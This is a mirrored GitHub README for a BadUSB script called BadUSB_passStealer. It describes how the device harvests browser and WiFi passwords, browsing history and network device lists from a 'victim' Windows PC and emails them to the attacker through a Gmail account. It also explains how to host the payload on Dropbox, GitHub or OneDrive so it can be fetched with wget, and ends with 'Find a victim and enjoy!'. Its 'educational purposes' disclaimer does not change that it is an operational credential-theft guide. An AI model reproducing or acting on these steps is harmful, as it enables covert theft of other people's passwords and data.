Giter VIP home page Giter VIP logo

badusb_passstealer's Introduction

BadUSB_passStealer

Warning ⚠️

Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB.

About ℹ️

This script allows you to steal the following information :

  • Browser passwords (Chrome, Firefox, Opera);
  • WiFi passwords;
  • Browser history from the last 7 days;
  • The list of all devices that are connected to victim's network;

NB n°1 (for arduino BadUSB)

Sometimes, you will see something like this :

Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll(); 

This is only to write these characters : "@", "\". But it depends on the computer's layout, so adapt these characters thanks to this site and the sequence you actually use to wirte these characters with your keyboard. (or switch the keyboard layout to French).

US Layout

For US layout you only have to replace by this for "\" :

Keyboard.press(92);
Keyboard.releaseAll();

And by this for "@" :

Keyboard.press(64);
Keyboard.releaseAll();

NB n°2

You can customize the delay according to the speed in which you plug the BadUSB.

NB n°3

When you plug the BadUSB in a PC you have to wait for the caps lock to flash to unplug it.

Getting Started ✔️

Requirments

  1. Have a BadUSB.

  2. Install Arduino software here (if you use a BadUSB which is based on arduino);

  3. Have a Gmail account and enable less secure app here;

  4. Have a victim with Windows OS installed in his PC;

Install

  1. Download this repository;

Linux :

git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer

Windows : Click on green button on right top of main page. Then click on "Download Zip" and extract zip file.

  1. Replace your mail and password here at line 16, 18, 19;

  2. Replace link in .ino at line 85 or .txt at line 28;

  3. Put the .ino or .txt file in your BadUSB;

  4. Find a victim and enjoy !

Requirments for victim PC

  • Turn off caps lock.
  • Switch the keyboard layout to French (or adapt the code according to your layout).

How to set a link for wget the script ⬇️

Dropbox

  1. Create a dropbox account here;

  2. Upload your file;

  3. Copy the link of the file and change ?dl=0 by ?dl=1;

  4. You will get a link like this : https://dropbox.com/s/link/YOURFILE?dl=1;

  5. Now put this link in the .ino or .txt file;

Github

  1. Create a Github account here;

  2. Create a public repository;

  3. Upload your file;

  4. Go to your file page and click on RAW button;

  5. Copy the RAW page link and put it in the .ino or .txt file;

One Drive

  1. Create a One Drive account here;

  2. Upload your file file;

  3. Follow this tutorial

  4. Put the link you got in the .ino or .txt

Nirsoft tools 🧰

You can download nirsoft tools below if you want :

badusb_passstealer's People

Contributors

tuconnaisyouknow avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.